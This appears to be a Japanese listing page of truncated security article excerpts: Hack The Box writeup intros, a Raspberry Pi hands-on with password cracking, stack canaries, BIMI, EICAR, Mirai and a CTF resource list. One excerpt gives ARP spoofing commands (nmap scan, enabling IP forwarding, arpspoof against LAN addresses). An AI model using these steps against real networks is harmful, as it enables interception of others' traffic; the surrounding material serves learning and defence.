今さら聞けないセキュリティ 2020年08月07日

今さら聞けないセキュリティ 2020年08月07日

RaspberryPi で初歩のセキュリティハンズオン その2

「オープンハードセキュリティ #5」
https://openhardsecurity.connpass.com/event/184982/
のテキストです。

深センのものづくり企業 Ideagear の社内勉強会を兼ねて、セキュリティの初歩的なハンズオンをします。

前回はこちら
「RaspberryPi で初歩のセキュリティハンズオン その1」
https://qiita.com/nanbuwks/items/1593356f3a15d7fc348f

# やること

– 19:00 オープニング、ssh 設定
– 19:05 自己紹介とIdeagear の説明
– 19:15 録画スタート、RaspberryPi にログイン、前回の復習、Linuxの 基本操作
– 19:25 John the Ripper を使ってパスワードクラッキング実習
– 19:35 過去に侵入されたRaspberryPiの解析
– 19:45 (応募があれば)ライトニングトーク
– 19:55 クロージング、次回開催のアナウンス

講師のRaspberry Pi 上にインターネット経由で ssh で

元記事を表示

Hack The Box[OpenAdmin] -Writeup-

# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
Hack The Box
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731

# OpenAdmin

![スクリーンショット 2020-08-04 15.40.23.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/bb26c562-8e16-6b63-93cc-46

元記事を表示

マルウェア自衛のためのちょっとしたスクリプト

皆様、在宅ワーク万歳な日々を過ごしでしょうか?
先週は久々に現場に駆り出されましたが、
電車内はコロナ禍なんて嘘のような様子でした

コロナとは…:thinking:

# セキュリティ需要の高まり

それはさておき、在宅の増えた昨今では端末のセキュリティについて
考えることも増えたのではないかと思います。

最近だとEMOTETなどのようなマルウェアなどのニュースを見聞きして
怖いなと警戒心が一時的に高まったりすることもあるかとおもいます。

でも日時が立つとそんな警戒心なども薄れて、変なサイトにアクセスしてしまったり、
行きつけのサイトに変なものを埋め込まれたりする可能性も
無きにしも非ずです。

そんなマルウェアが私たちの端末で悪さをするには
自動起動登録する必要があります。
なので、日々自動起動されるプログラムを確認することで、
うちに忍び込む不審な輩に気づくきっかけになったら…!

![bouhan_camera_dorobou[1].png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/26065

元記事を表示

SSP(Stack Smashing Protector)に使用される「カナリア」について調べてみた

# はじめに
スタックオーバーフローの勉強をしていると「*** stack smashing detected ***」という文字列をよく見かけます。
実際にはどのようにしてスタックオーバーフローを検知しているのか気になったので調べてみました。

# 再現環境
僕が使用している環境は次のようなものになります。

“`
# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION=”Ubuntu 18.04.4 LTS”

# gcc -dumpversion
7
“`

# カナリアについて簡単に
カナリアとは、SSP(Stack Smashing Protector)の実装方法の一つです。
カナリアと呼ばれる4byteの領域をローカル変数とリターンアドレスの間に挿入し、特定の値で初期化します。
関数終了時にカナリアの値が書き換えられているかどうかをチェックし、値が書き換えられている場合はスタックオーバーフローを検出することになりま

元記事を表示

CNN の BIMI レコードを調べてみた

GmailにBIMI準拠の認証企業/ブランドロゴ表示機能
https://pc.watch.impress.co.jp/docs/news/1267121.html
https://cloud.google.com/blog/products/g-suite/gsuite-security-updates-for-gmail-meet-chat-and-admin

Google が Gmail プラットフォームにおいて BIMI 規格のサポートをするというアナウンスがあり、DigiCert が CNN の BIMI 準拠証明書を発行したとのことです。試しに確認してみました。

なお、僕自身はそこまで PKI や証明書のデータ構造などに詳しくないため、誤りや勘違いなどがあればご指摘ください。

# BIMI とは

All about BIMI


簡単に言えば、なりすましではないと確認された電子メールにロゴマークを表示して、フィッシングメールなどの攻撃からユーザーを保護する仕組みです。ロゴマークが表示される条件は、

– ドメインが DMARC

元記事を表示

情報セキュリティの3要素とは

#情報セキュリティとは

– Webシステムを運営していくのに、悪意を持ったユーザーから攻撃を受ける可能性も出てくる。そのため、セキュリティ対策が必須となる。

– **情報セキュリティ**とは、情報の**`「機密性」`**、**`「完全性」`**、**`「可用性」`**を維持することと定義されている。この3つを**情報セキュリティの3要素**と呼ぶ。

#機密性(Confidentiality)とは

– アクセスを認められた者だけが、その情報にアクセスできる状態を確保すること。つまり関係ない者に情報を見せないことを意味する。

#完全性(Integrity)とは

– 情報が破壊・改ざん・消去されていない状態を確保すること。

#可用性(Availability)とは

– 必要な時はいつでも情報にアクセスできる状態を確保すること。

元記事を表示

Hack The Box[Shocker] -Writeup-

# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
Hack The Box
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731

# Shocker
![コメント 2020-07-31 172043.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/6ceeeb44-e874-f0f4-e05d-2703ce1f11f2

元記事を表示

アンチウィルスソフトの動作検証で使用する検体(サンプル)を探せ!

[Wano株式会社](https://wano.co.jp/)で社内のもろもろを担当しているakibinです。

↑の弊社コーポレートサイトはいま自分が好きな動画や音楽をアップできるのですが、最近新卒のJunyaくんが上げてる短編小説のようなレビューが面白い。私もくらげになりたい。
![スクリーンショット 2020-07-31 10.10.51.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/504009/276896b5-1b06-b58b-c84d-f9049d795b4b.png)

#アンチウィルスソフトの動作検証をしたい
と思い、動作検証で使用できる検体を探してみました。

#探索
###【EICARテストファイル】
その名の通り、EICARが提供しているテストファイル。特定の文字列をメモ帳などにコピペして拡張子(.com)を付けて保存するだけ。
詳しくは[EICARテストファイル](https://ja.m.wikipedia.org/wiki/EICAR%E3%83%86%E3%82%B9%

元記事を表示

Javascript知らない男のGAS 2

さて書くべきコードは大まかに、GASにLINEからデータが来た時の処理、返信内容、返信をするために必要な認証情報の付与 といったところです。実際にコードを見ていきましょう。割と最低限のコードです。コメント無しをGithubにも載せておきます。
https://github.com/hinawakasonoko/desktop-tutorial/blob/master/Code.gs
#コード
“`
//具体的な値は事前に指定しています 説明はコード後に
var CHANNEL_ACCESS_TOKEN = PropertiesService.getScriptProperties().getProperty(“token”);
var id = PropertiesService.getScriptProperties().getProperty(“doc”);
//LINEから来たデータから使うものを取り出す部分
function doPost(post) {
var obj = JSON.parse(post.postData.contents);//HTTPSに来たPO

元記事を表示

Hack The Box[Sense] -Writeup-

# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
Hack The Box
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731

# Sense
![スクリーンショット 2020-07-29 17.27.12.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/1c9338dc-dadd-92b5-d7d3-48dace0

元記事を表示

CISM試験に合格するために実施したこと

ISACAのCISM(Certified Information Security Manager)試験に合格(2020/07/07)した際に利用した教材と勉強法です。CISMの詳細については[こちら](https://www.isaca.org/credentialing/cism)を参照。

# 背景
これまで取得したセキュリティの資格は、CEHとCSSLP。CEHの勉強法は[こちら](https://qiita.com/lorenpasserine/items/df4556bdab424a3cd71f)、CSSLPの勉強法は[こちら](https://qiita.com/lorenpasserine/items/f499a6a63dae9c54395b)。英語力は TOEIC 800後半くらい。

# 役に立った学習教材
試験勉強にあたって利用した学習教材です。

### [CISM Review Questions, Answers & Explanations Database](https://www.isaca.org/education/online-tools-and

元記事を表示

Hack The Box[Netmon] -Writeup-

# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
Hack The Box
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731

# Netmon
![コメント 2020-07-27 150137.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/8449e15c-cc54-5d35-e667-81f96351dd3c.

元記事を表示

【備忘】5G時代に備えるべきIoTを狙ったサイバー攻撃と対策を復習

# 初めに
5Gの登場により、医療・福祉・交通インフラ・農業など様々な分野でのIoT活用が期待され、急速に成長しています。
IDC は、2025 年までに世界で 416 億のデバイスが接続され、合計 79.4 ゼタバイトのデータを生成すると予測しています。
そして、Statista は、2025 年にオンラインで接続されるエンドポイントは 750 億を超えると予測しています。

そんな中、この注目市場を狙った攻撃手段が次々と出てきており、それらへの対策はビジネスしていく中だけでなく、生きていく上で必須と言えるでしょう。

今ある主な攻撃と対策を以下にまとめました。

# IoTデバイスを狙うマルウェア「Mirai」
2016年頃、世界的に感染が広がったマルウェアが「Mirai」です。
ハッカーズネットにソースコードを投稿した者が「Anna-senpai」(杏奈先輩@@?)という、かわいらしいネーミングですが、その影響はかわいらしくないものでした。
インターネットにつながる様々なIoT機器を標的に、これら機器の脆弱性を利用してMiraiが感染すると、攻撃者が遠隔操作可能な状態(踏み台)

元記事を表示

RDSのMariaDBにてロールを使って権限管理

# はじめに
AWSのRDSにて、MariaDBを使ってみました。
サービスごとに権限を分けてロールで管理して使うようにしたのですが、
そのような例がネット上にあまり見つからなかったので、
記録として残しておきます。

実行したMariaDBのバージョンは10.4です。
ロール機能は10.0.5からですが、
実質的にはデフォルトロールが使える10.1からが
ロール対応バージョンということのようです。

ちなみにMySQLでは8.0からロール機能が使えます。

# 構成

![概要図.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/436247/025f7b44-459d-0243-359f-74a95e72b7d2.png)

サービスごとにDB(スキーマ)をservice01_db, service02_dbの2つ作ります。
service01_roleに属しているservice01_userはservice01_dbにのみアクセス可能にします。
service02についても同様です。

どちらのDBに

元記事を表示

ドメイン駆動設計の戦略的デザインとA2AD戦略を組み合わせた多層防御システムの考案

#領域支配戦略に基づくドメイン駆動設計の戦略的デザインの考案
サイバー空間はクラッカーによるDoS攻撃やハッキングによる遠隔操作など行われる攻撃手法が年々進化しているが、攻撃に対する有効な防衛手法が確立されていない。
これは、防衛方法に統一された理論が存在せず、各々がファイヤーウォールやDMZなど様々な手段で対抗しているのが原因だと思われる。
今回の記事では、エリックエヴァンスが考案した**戦略的デザイン**のアイディアに領域支配戦略である**A2AD戦略**の思想を取り入れ、サイバー空間に統一した防衛理論を提案する。

#A2AD戦略とは
**A2AD(接近阻止・領域拒否)戦略**とは、空母や戦闘機による支配領域への侵入を拒否するために考案された領域支配戦略のことである。
**A2AD戦略**は接近阻止(A2)戦略と領域拒否(AD)作戦によって構成される。
**A2AD戦略**は領域に侵入する対象の手段に対抗する非対称的なアプローチを用いる。
空母や戦闘機は電子機器の塊であるため、電磁波領域からのジャミングなどに脆弱である。
戦略レベルによって実行されミサイル防衛システムによる接近阻

元記事を表示

ARPスプーフィング手順 ( 中間者攻撃 , MITM )

## 1. 攻撃対象のIPアドレス取得
“`
ifconfig
“`
“`
arp -a
“`
“`
nmap -F 192.168.XXX.XXX/24
“`
などなど

![](https://i.imgur.com/3AJGXxB.png)

## 2. 攻撃者のPCを経由するパケットをフォワードさせるためにIPフォワーディングを有効
1で有効

“`
echo 1 > /proc/sys/net/ipv4/ip_forward
“`

0で無効

“`
echo 0 > /proc/sys/net/ipv4/ip_forward
“`

![](https://i.imgur.com/GGbQHTO.png)

## 3. ARPテーブル書き換え
NICを wlan0 に指定して,192.168.100.123 のARPテーブルにある 192.168.100.124 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える

“`
sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124

元記事を表示

【メモ】サイバーセキュリティ演習

CTFやサイバーセキュリティ演習にどんなものが?を調べたリスト

# Cyber storm
* Newton Consulting: [海外事例に学ぶサイバー演習手法その③-Cyber Storm IV](https://www.newton-consulting.co.jp/itilnavi/column/cyber_storm_V.html)
* METI: [平成 29 年度サイバーセキュリティ経済基盤構築事業 METI/IBM] (https://www.meti.go.jp/meti_lib/report/H29FY/000120.pdf)
* JETRO/IPA: [米国連邦政府のサイバーセキュリティ政策を巡る最近の動向 2011-03] (http://www.jif.org/column/pdf2011/201103.pdf)
* 星野英二氏[米国国土安全保障省(DHS)が全国家的規模の第1回「サーバー・ストーム演習」の完了を報告 2010-10-06 20](https://blog.goo.ne.jp/hosiei/e/def9cd69f5aa2bdd

元記事を表示

【メモ】Twitter 2020年7月

my first Qiita!
事件概要のメモ
#Twitterのアカウント乗っ取り事件(Twitter社)
01 Twitter: [An update on our security incident](https://blog.twitter.com/en_us/topics/company/2020/an-update-on-our-security-incident.html)
02 [Official Tweet] (https://twitter.com/TwitterSupport/status/1283518038445223936)

> We are aware of a security incident impacting accounts on Twitter. We are investigating and taking steps to fix it. We will update everyone shortly.

# 関連記事
11 日本経済新聞: [ツイッター、言論基盤に傷 著名人アカウント乗っ取り 米大統領選前に不正な侵入許す](
ht

元記事を表示

RaspberryPi で初歩のセキュリティハンズオン その1

「オープンハードセキュリティ #4」
https://openhardsecurity.connpass.com/event/183696/
のテキストです。

深センのものづくり企業 Ideagear の社内勉強会を兼ねて、セキュリティの初歩的なハンズオンをします。

# やること

– 19:00 オープニング、ssh 設定、自己紹介、Ideagear の説明など
– 19:20 RaspberryPi にログイン、Linuxの 基本操作
– 19:30 破壊行為実習
– 19:40 ハニーポッド設置、ログ監視
– 19:50 クロージング、次回開催のアナウンス

講師のRaspberry Pi 上にインターネット経由で ssh でログオンできるようにしています。

![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/139524/ef95b884-702d-5012-e9f1-09075695d7c6.png)

写真は別勉強会でRaspberryPiを使って更に他のワンボードマイコン

元記事を表示

Hack The Box[Jerry] -Writeup-

# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
Hack The Box
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731

# Jerry

スクリーンショット 2020-07-22 17.17.37.png

  • OTHERカテゴリの最新記事